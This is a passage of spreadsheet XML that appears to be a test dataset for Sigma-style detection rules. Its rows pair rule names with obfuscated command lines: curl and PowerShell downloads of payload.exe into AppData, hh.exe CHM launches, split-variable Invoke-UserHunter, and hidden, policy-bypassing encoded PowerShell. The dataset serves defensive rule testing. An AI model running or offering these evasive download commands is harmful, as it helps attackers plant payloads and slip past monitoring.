        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E608" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /C "set protocol=http&amp;&amp; set url=://example.com/file.exe&amp;&amp; set dest=%USERPROFILE%\AppData\Roaming\file.exe&amp;&amp; call curl %protocol%%url% -o %dest%"</t>
        </is>
      </c>
      <c r="F608" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G608" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H608" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I608" s="43" t="n"/>
      <c r="J608" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K608" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="609" ht="15.75" customHeight="1" s="42">
      <c r="A609" s="44" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B609" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C609" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D609" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E609" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Invoke-WebRequest -Uri http://example.com/payload.exe -OutFile $env:APPDATA\payload.exe"</t>
        </is>
      </c>
      <c r="F609" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G609" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H609" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I609" s="43" t="n"/>
      <c r="J609" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K609" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="610" ht="15.75" customHeight="1" s="42">
      <c r="A610" s="43" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B610" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C610" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D610" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E610" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /C "curl h^t^t^p^s^:^/^/[example.com/payload.exe]() -o %AppData%\payload.exe"</t>
        </is>
      </c>
      <c r="F610" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G610" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H610" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I610" s="44" t="n"/>
      <c r="J610" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K610" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="611" ht="15.75" customHeight="1" s="42">
      <c r="A611" s="43" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B611" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C611" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D611" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E611" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /C "curl http://example.com/payload.exe -o %USERPROFILE%\AppData\Roaming\payload.exe"</t>
        </is>
      </c>
      <c r="F611" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G611" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H611" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I611" s="43" t="n"/>
      <c r="J611" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K611" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="612" ht="15.75" customHeight="1" s="42">
      <c r="A612" s="43" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B612" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C612" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D612" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E612" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "set A=App&amp;&amp; set D=Data&amp;&amp; cmd /c curl h^ttp://example.local/test.txt -o %USERPROFILE%\%A%%D%\Roaming\test.txt"</t>
        </is>
      </c>
      <c r="F612" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G612" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H612" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I612" s="44" t="n"/>
      <c r="J612" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K612" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="613" ht="15.75" customHeight="1" s="42">
      <c r="A613" s="43" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B613" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C613" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D613" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E613" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /V:ON /c "curl http://example.com/payload.exe -o !AppData!\payload.exe"</t>
        </is>
      </c>
      <c r="F613" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G613" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H613" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I613" s="44" t="n"/>
      <c r="J613" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K613" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="614" ht="15.75" customHeight="1" s="42">
      <c r="A614" s="43" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B614" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C614" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D614" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E614" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /v:on /c "curl http://example.com/payload.exe -o !AppData!\payload.exe"</t>
        </is>
      </c>
      <c r="F614" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G614" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H614" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I614" s="44" t="n"/>
      <c r="J614" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K614" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="615" ht="15.75" customHeight="1" s="42">
      <c r="A615" s="43" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B615" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C615" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D615" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E615" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"V:ON" /c "curl http://example.com/payload.exe -o !AppData!\payload.exe"</t>
        </is>
      </c>
      <c r="F615" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G615" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H615" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I615" s="44" t="n"/>
      <c r="J615" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K615" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="616" ht="15.75" customHeight="1" s="42">
      <c r="A616" s="43" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B616" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C616" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D616" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E616" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ComMAnd "Invoke-WebRequest -Uri 'http://example.com/payload.exe' -OutFile \" $env:APPDATA\payload.exe\""</t>
        </is>
      </c>
      <c r="F616" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G616" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H616" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I616" s="43" t="n"/>
      <c r="J616" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K616" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="617" ht="15.75" customHeight="1" s="42">
      <c r="A617" s="43" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B617" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C617" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D617" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E617" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Invoke-WebRequest -Uri 'http://example.com/payload.exe' -OutFile \" $env:APPDATA\payload.exe\""</t>
        </is>
      </c>
      <c r="F617" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G617" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H617" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I617" s="43" t="n"/>
      <c r="J617" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K617" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="618" ht="15.75" customHeight="1" s="42">
      <c r="A618" s="43" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B618" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C618" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D618" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E618" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COmmANd "Invoke-WebRequest -Uri 'http://example.com/payload.exe' -OutFile \" $env:APPDATA\payload.exe\""</t>
        </is>
      </c>
      <c r="F618" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G618" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H618" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I618" s="43" t="n"/>
      <c r="J618" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K618" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="619" ht="15.75" customHeight="1" s="42">
      <c r="A619" s="43" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B619" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C619" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D619" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E619" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COMmAND "Invoke-WebRequest -Uri 'http://example.com/payload.exe' -OutFile \" $env:APPDATA\payload.exe\""</t>
        </is>
      </c>
      <c r="F619" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G619" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H619" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I619" s="43" t="n"/>
      <c r="J619" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K619" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="620" ht="15.75" customHeight="1" s="42">
      <c r="A620" s="43" t="n"/>
      <c r="B620" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_path_traversal</t>
        </is>
      </c>
      <c r="C620" s="44" t="inlineStr">
        <is>
          <t>Potential CommandLine Path Traversal Via Cmd.EXE</t>
        </is>
      </c>
      <c r="D620" s="44" t="inlineStr">
        <is>
          <t>087790e3-3287-436c-bccf-cbd0184a7db1</t>
        </is>
      </c>
      <c r="E620" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "..\..\Windows\System32\calc.exe"</t>
        </is>
      </c>
      <c r="F620" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G620" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H620" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I620" s="43" t="n"/>
      <c r="J620" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K620" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="621" ht="15.75" customHeight="1" s="42">
      <c r="A621" s="43" t="n"/>
      <c r="B621" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_path_traversal</t>
        </is>
      </c>
      <c r="C621" s="44" t="inlineStr">
        <is>
          <t>Potential CommandLine Path Traversal Via Cmd.EXE</t>
        </is>
      </c>
      <c r="D621" s="44" t="inlineStr">
        <is>
          <t>087790e3-3287-436c-bccf-cbd0184a7db1</t>
        </is>
      </c>
      <c r="E621" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /C "..\..\Windows\System32\calc.exe"</t>
        </is>
      </c>
      <c r="F621" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G621" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H621" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I621" s="43" t="n"/>
      <c r="J621" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K621" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="622" ht="15.75" customHeight="1" s="42">
      <c r="A622" s="43" t="n"/>
      <c r="B622" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C622" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D622" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E622" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "cd C:\Users\Public\Downloads &amp;&amp; hh.exe payload.chm"</t>
        </is>
      </c>
      <c r="F622" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G622" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H622" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I622" s="44" t="n"/>
      <c r="J622" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K622" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="623" ht="15.75" customHeight="1" s="42">
      <c r="A623" s="43" t="n"/>
      <c r="B623" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C623" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D623" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E623" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "cd C:\Users\Victim\Downloads\ &amp;&amp; hh.exe payload.chm"</t>
        </is>
      </c>
      <c r="F623" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G623" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H623" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I623" s="44" t="n"/>
      <c r="J623" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K623" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="624" ht="15.75" customHeight="1" s="42">
      <c r="A624" s="43" t="n"/>
      <c r="B624" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_cobaltstrike_bloopers_modules</t>
        </is>
      </c>
      <c r="C624" s="44" t="inlineStr">
        <is>
          <t>Operator Bloopers Cobalt Strike Modules</t>
        </is>
      </c>
      <c r="D624" s="44" t="inlineStr">
        <is>
          <t>4f154fb6-27d1-4813-a759-78b93e0b9c48</t>
        </is>
      </c>
      <c r="E624" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "set a=Invoke-&amp;set b=UserHunter&amp;call powershell -c %a%%b%"</t>
        </is>
      </c>
      <c r="F624" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G624" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H624" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I624" s="43" t="n"/>
      <c r="J624" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K624" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="625" ht="15.75" customHeight="1" s="42">
      <c r="A625" s="43" t="n"/>
      <c r="B625" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_cobaltstrike_bloopers_modules</t>
        </is>
      </c>
      <c r="C625" s="44" t="inlineStr">
        <is>
          <t>Operator Bloopers Cobalt Strike Modules</t>
        </is>
      </c>
      <c r="D625" s="44" t="inlineStr">
        <is>
          <t>4f154fb6-27d1-4813-a759-78b93e0b9c48</t>
        </is>
      </c>
      <c r="E625" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Invoke-UserHunter"</t>
        </is>
      </c>
      <c r="F625" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G625" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H625" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I625" s="43" t="n"/>
      <c r="J625" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K625" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="626" ht="15.75" customHeight="1" s="42">
      <c r="A626" s="43" t="n"/>
      <c r="B626" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C626" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D626" s="44" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E626" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -nOp -noNi /"w" 1 -ExeC bypass -c "Write-Host 'Test'"</t>
        </is>
      </c>
      <c r="F626" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G626" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H626" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I626" s="43" t="n"/>
      <c r="J626" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K626" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="627" ht="15.75" customHeight="1" s="42">
      <c r="A627" s="43" t="n"/>
      <c r="B627" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C627" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D627" s="44" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E627" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -NoProfile -noni -W 1 /"exec" bypass -Command "Write-Host 'Test'"</t>
        </is>
      </c>
      <c r="F627" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G627" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H627" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I627" s="44" t="n"/>
      <c r="J627" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K627" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="628" ht="15.75" customHeight="1" s="42">
      <c r="A628" s="43" t="n"/>
      <c r="B628" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C628" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D628" s="44" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E628" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"nop" -noni -w 1 -exEC bypass -Command "Write-Host 'Test'"</t>
        </is>
      </c>
      <c r="F628" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G628" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H628" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I628" s="44" t="n"/>
      <c r="J628" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K628" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="629" ht="15.75" customHeight="1" s="42">
      <c r="A629" s="43" t="n"/>
      <c r="B629" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C629" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D629" s="44" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E629" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"nop" -noni -w 1 -eXeC bypass -Command "Write-Host 'Test'"</t>
        </is>
      </c>
      <c r="F629" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G629" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H629" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I629" s="44" t="n"/>
      <c r="J629" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K629" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="630" ht="15.75" customHeight="1" s="42">
      <c r="A630" s="43" t="n"/>
      <c r="B630" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C630" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D630" s="44" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E630" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"nop" /"noni" -w 1 -exec bypass -Command "Write-Host 'Test'"</t>
        </is>
      </c>
      <c r="F630" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G630" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H630" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I630" s="44" t="n"/>
      <c r="J630" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K630" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="631" ht="15.75" customHeight="1" s="42">
      <c r="A631" s="43" t="n"/>
      <c r="B631" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C631" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D631" s="44" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E631" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"NoProfile" -NonInteractive -WinDOwsTYle Hidden -ep Bypass /"Command" "Write-Host 'Test'"</t>
        </is>
      </c>
      <c r="F631" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G631" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H631" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I631" s="44" t="n"/>
      <c r="J631" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K631" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="632" ht="15.75" customHeight="1" s="42">
      <c r="A632" s="43" t="n"/>
      <c r="B632" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C632" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D632" s="44" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E632" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -nop -NoNiNTeRActIVe -"WindowStyle" Hidden -EXECUtionpOLIcY Bypass -"Command" "Write-Host 'Test'"</t>
        </is>
      </c>
      <c r="F632" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G632" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H632" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I632" s="43" t="n"/>
      <c r="J632" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K632" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="633" ht="15.75" customHeight="1" s="42">
      <c r="A633" s="43" t="n"/>
      <c r="B633" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C633" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D633" s="44" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E633" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"NoProfile" -nOniNteRacTivE -"WindowStyle" Hidden -EXECuTIONpOlIcy Bypass -c "Write-Host 'Test'"</t>
        </is>
      </c>
      <c r="F633" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G633" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H633" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I633" s="44" t="n"/>
      <c r="J633" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K633" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="634" ht="15.75" customHeight="1" s="42">
      <c r="A634" s="43" t="n"/>
      <c r="B634" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C634" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D634" s="44" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E634" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -nOPRofiLe -ExeCuTionpOlicy Bypass -winDoWSTYle Hidden -"EncodedCommand" UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAIABDAHQAZQB...</t>
        </is>
      </c>
      <c r="F634" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G634" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H634" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I634" s="43" t="n"/>
      <c r="J634" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K634" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="635" ht="15.75" customHeight="1" s="42">
      <c r="A635" s="43" t="n"/>
      <c r="B635" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C635" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D635" s="44" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E635" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -NOpRoFIle /"ExecutionPolicy" Bypass /"WindowStyle" Hidden /"EncodedCommand" UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAIABDAHQAZQB...</t>
        </is>
      </c>
      <c r="F635" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G635" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H635" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I635" s="43" t="n"/>
      <c r="J635" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K635" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="636" ht="15.75" customHeight="1" s="42">
      <c r="A636" s="43" t="n"/>
      <c r="B636" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C636" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D636" s="44" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E636" s="44" t="inlineStr">
        <is>
